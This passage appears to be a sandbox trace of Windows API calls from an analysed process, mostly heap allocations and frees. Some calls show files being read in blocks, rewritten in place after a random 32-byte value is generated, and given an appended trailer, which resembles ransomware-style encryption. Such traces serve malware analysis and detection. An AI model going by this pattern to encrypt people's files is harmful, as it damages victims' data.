0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.691] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.691] GetProcessHeap () returned 0x4f10000 [0078.692] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.692] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.692] WriteFile (in: hFile=0x808, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.692] WriteFile (in: hFile=0x808, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.692] GetProcessHeap () returned 0x4f10000 [0078.692] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.692] GetProcessHeap () returned 0x4f10000 [0078.692] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.692] GetProcessHeap () returned 0x4f10000 [0078.692] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.692] CloseHandle (hObject=0x808) returned 1 [0078.693] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 34 [0078.693] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.694] ReadFile (in: hFile=0x80c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.694] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.694] GetProcessHeap () returned 0x4f10000 [0078.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.694] GetProcessHeap () returned 0x4f10000 [0078.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.694] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.694] GetProcessHeap () returned 0x4f10000 [0078.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.694] ReadFile (in: hFile=0x80c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.745] WriteFile (in: hFile=0x80c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.745] GetProcessHeap () returned 0x4f10000 [0078.745] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.746] GetProcessHeap () returned 0x4f10000 [0078.746] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.747] GetProcessHeap () returned 0x4f10000 [0078.747] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.748] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.748] GetProcessHeap () returned 0x4f10000 [0078.749] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.749] GetProcessHeap () returned 0x4f10000 [0078.749] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.750] SetFilePointerEx (in: hFile=0x80c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.750] WriteFile (in: hFile=0x80c, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0078.750] WriteFile (in: hFile=0x80c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.750] GetProcessHeap () returned 0x4f10000 [0078.750] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.750] GetProcessHeap () returned 0x4f10000 [0078.750] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.750] GetProcessHeap () returned 0x4f10000 [0078.750] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.750] CloseHandle (hObject=0x80c) returned 1 [0078.751] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 35 [0078.751] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.751] ReadFile (in: hFile=0x804, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0078.751] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.751] GetProcessHeap () returned 0x4f10000 [0078.751] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.751] GetProcessHeap () returned 0x4f10000 [0078.751] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0078.751] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0078.751] GetProcessHeap () returned 0x4f10000 [0078.751] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0078.751] ReadFile (in: hFile=0x804, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x494, lpOverlapped=0x0) returned 1 [0078.814] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0xfffffb6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.814] WriteFile (in: hFile=0x804, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x494, lpOverlapped=0x0) returned 1 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.814] GetProcessHeap () returned 0x4f10000 [0078.814] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.815] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.815] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.816] GetProcessHeap () returned 0x4f10000 [0078.816] HeapFree (in: 